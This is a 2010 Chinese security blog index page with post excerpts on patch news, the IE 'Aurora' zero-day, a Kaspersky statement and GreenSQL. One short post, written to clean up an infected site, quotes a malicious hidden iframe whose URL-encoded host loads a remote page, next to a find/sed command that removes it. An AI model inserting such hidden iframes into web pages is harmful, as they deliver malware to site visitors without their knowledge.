鲜橙加冰的安全 - 51CTO技术博客

文章

矩阵对抗与漏洞补丁201001(第4期)

置顶

2010-01-14 11:42:49

下载地址：
http://down.51cto.com/data/59446

http://www.cate100.com/orange/juzhenduikang201001-4.pdf

目录

写在前面.............1

火线修复..........3

微软2010 年1 月安全公告Windows2000 独领风骚......3
Discuz! 重要安全补丁For Discuz! 7.1 Discuz! 7.2.............4
FileZilla 3.3.1.0 新版升级修复bug.................5
Mozilla Firefox 3.5.7、3.0.17 同时发布.....5
告别漏洞帝称号Adobe 采用自动补丁升级..................6

热点播报.............7

继Twitter 之后baidu 又被“伊朗网络部队”攻陷..

类别：矩阵对抗与漏洞补丁 | 阅读全文(226) | 回复(5)

写个shell替换掉文件里面木马

2010-02-05 21:00:02

需要写个shell替换掉文件里面木马：木马是：<iframe
src="http://%35%36%37%30%35%2E%33%33%32%32%2E%6F%72%67/images/common/yr.htm"width=0
height=100 ></iframe>

find /var/www/html -type f -exec sed -i 's#目标字符串#替换后字符#g' {} \;

类别：web安全 | 阅读全文(34) | 回复(0)

RSA总裁：公有云本质为“私有云” 虚拟化安全可“..

2010-02-01 15:29:25

RSA总裁：公有云本质为“私有云” 虚拟化安全可“内嵌”

【51CTO.com 独家特稿】云计算、安全的虚拟化、整合。我们听过很多次，但是最热衷于谈这类话题的是谁呢？没错，是RSA。

文/图王文文(鲜橙加冰)

2009年6月份，EMC副总裁、RSA全球总裁亚瑟·科维洛(Arthur W. Coviello)在接受记者采访时称：全社会，包括厂商、行业协会、企业甚至政府间都要加强协作，共同打击网络犯罪。安全厂商需要进行更多协作，需要强有力的安全生态系统，建立共同的信息风险管理流程。然而，当前的信息安全技术仍处于各自为战的..

类别：IT业界 | 阅读全文(266) | 回复(1)

卡巴斯基针对Google Adsense广告报警一事的声明

2010-01-26 12:39:56

卡巴斯基在2010年1月25日接到部分用户反馈误报Google adsense广告代码，卡巴斯基按照严格的技术测试管理程序进行测试。在确认这是一次误报后，卡巴斯基方面第一时间进行了问题的处理，并在当日下午做出了修正，同时确保该问题在当晚的病毒库更新中已经得到了解决。卡巴斯基向所有受到影响的站长深表歉意。

北京卡巴斯基科技有限公司
2010年1月26日

类别：IT业界 | 阅读全文(20) | 回复(0)

中国互联网是开放的中国也是互联网发展最活跃的国家

2010-01-23 00:42:30

问：美国国务卿希拉里-克林顿21日就“互联网自由”问题发表演讲，其中谈到中国互联网管理政策，认为中方限制互联网自由，请问中方对此有何评论？
答：美方指责中国的互联网管理政策，影射中国限制互联网自由。对于这种违背事实、损害中美关系的言行，我们坚决反对。
中国互联网是开放的，中国也是互联网发展最活跃的国家，到去年底，中国网民达3.84亿，网站达368万个，博客1.8亿。中国宪法保护公民的言论自由，推动互联网的发展是我们的一贯政策。中国有自己的国情和文化传统，中国对互联网坚持依法管理，符合世界通行做法。
中国法..

类别：IT业界 | 阅读全文(23) | 回复(0)

“极光”末日微软今日发正式补丁修复8个IE漏洞

2010-01-22 14:19:10

“极光”末日微软今日发补丁修复8个IE漏洞

北京时间凌晨1月22日，微软发布了重要的Internet Explorer的累计补丁，也就是传说中的“极光”漏洞的官方正式补丁，总共修复了8个漏洞。

本次安全更新涉及IE5/6/7/8四个版本，安装该更新后可以防止近期针对IE的攻击，微软建议Windows用户尽快部署此安全更新。此正式补丁发布之前，国内已经有多家安全公司发布临时补丁或修复工具。

下载：http://www.microsoft.com/technet/security/bulletin/MS10-002.mspx

微软MS10-002(KB978207)安全补丁：

..

类别：浏览器帝国 | 阅读全文(41) | 回复(0)

IE零日修补忙众说纷纭战“极光”

2010-01-21 18:01:24

IE零日修补忙众说纷纭战“极光”

【51CTO.com独家观察】2010年1月12日，谷歌对外宣布称发现有大陆黑客正利用这种漏洞对自己和其它几家美国公司发起攻击，另外谷歌同时还表示攻击的目标还包括多位私人用户的Gmail邮箱。

文/ 鲜橙加冰(王文文)

传闻攻击用到了IE的一个零日漏洞，此事甚至激起了Google退出中国的想法，于是有安全工程师戏称：一个IE 0day引发了中美关系紧张。随后微软起草了一份安全咨询报告，并发布了对Zero-day漏洞威胁的风险评估。

零日公开各厂商表态
1月15日，..

类别：浏览器帝国 | 阅读全文(511) | 回复(2)

一起来做数据库审计和保护之在centos上装greensql

2010-01-20 23:17:27

数据库安全现在很受重视，如何保护数据库也是很多人关心的。
greensql就是一个保护数据库的软件，不过目前只保护开源的。呵呵，海豚和大象大家没玩过也听过吧，没错，就是mysql和postgresql。

今天在一个机器上测试greensql，发现配了半天，管理界面死活登录不了，仔细一看原来没装php。囧啊。不过现在好了，能进去了（第一次登陆管理界面会很慢，耐心一点，当然你机器牛应该不会遇到这种问题。）

分享个后台管理的图给大家

ps：有需要了解或交流这个东东的筒子可以联系我。我的联系方式博客左上角有。
邮箱是wangww#51cto.com，Gtalk是verdureorange#gmail.com

另外，其他一些商业保护，如DLP之类的牛x保护案例大家也可以踊跃投稿，有稿费的。无论你是用IBM的产品还是McAfee的，或者是卡巴斯基的、赛门铁克的都可以。[/img]..

类别：数据库相关 | 阅读全文(53) | 回复(0)

如何保护的你的开源数据库:GreenSQL可助一臂之力

2010-01-20 14:21:57

如何保护的你的开源数据库:GreenSQL可助一臂之力

首先我被感动的是项目的名称GreenSQL，人的名树的影，听起来就是不一样，非常的清爽。不仅是名称，上面的log设计也非常可爱，一个拿着板斧的绿色的小犀牛，在保护你的DB系统。

该产品是开源产品，目的也是仅仅保护开源的数据库系统MYSQL和PostgreSQL免遭SQL injection攻击。系统工作在Proxy模式。可以运行于多个Linux发行套件以及FreeBSD之上。对于PostgreSQL而言GreenSQL也是仅有的保护方案。对于SQL Injection不懂的可以Google一下，现在非常流行，我们隔三差五会..

类别：数据库相关 | 阅读全文(37) | 回复(0)

官方补丁要来了极光0day迫使微软提前发布

2010-01-19 10:12:00

官方补丁要来了极光0day迫使微软提前发布

前一阵子搞的沸沸扬扬的Google入侵案尚未平复，各机构研究结果纷纷表明，罪魁祸首是IE的一个0day造成的。此入侵事件甚至激起了Google退出中国的想法，于是有安全工程师笑称：一个IE 0day引发的中美关系紧张。

文/ 王文文

消息称，受黑客攻击影响最大的是IE6版本，但IE7和IE8同样易于受到攻击。但经过笔者的测试，IE8下利用起来非常麻烦，而IE6则可以轻易执行恶意代码。

于是周末的时候，有很多安全公司开始发布临时补丁，详情请见：
IE高危0Day漏洞！..

类别：系统安全 | 阅读全文(46) | 回复(0)

<< 1 2 3 4 5 >> 页数 ( 1/16 )

鲜橙加冰的相册

51CTO推荐博客

gehailong	狼哥
邹盼盼	delxu
pc2004lcq	danni505
randy_shan..	文平
神相	王易见
王超博	Luckcy_sky

51CTO推荐博文

更多..

说说sftp的chroot

rhel5.4上搭建oracle 10g RAC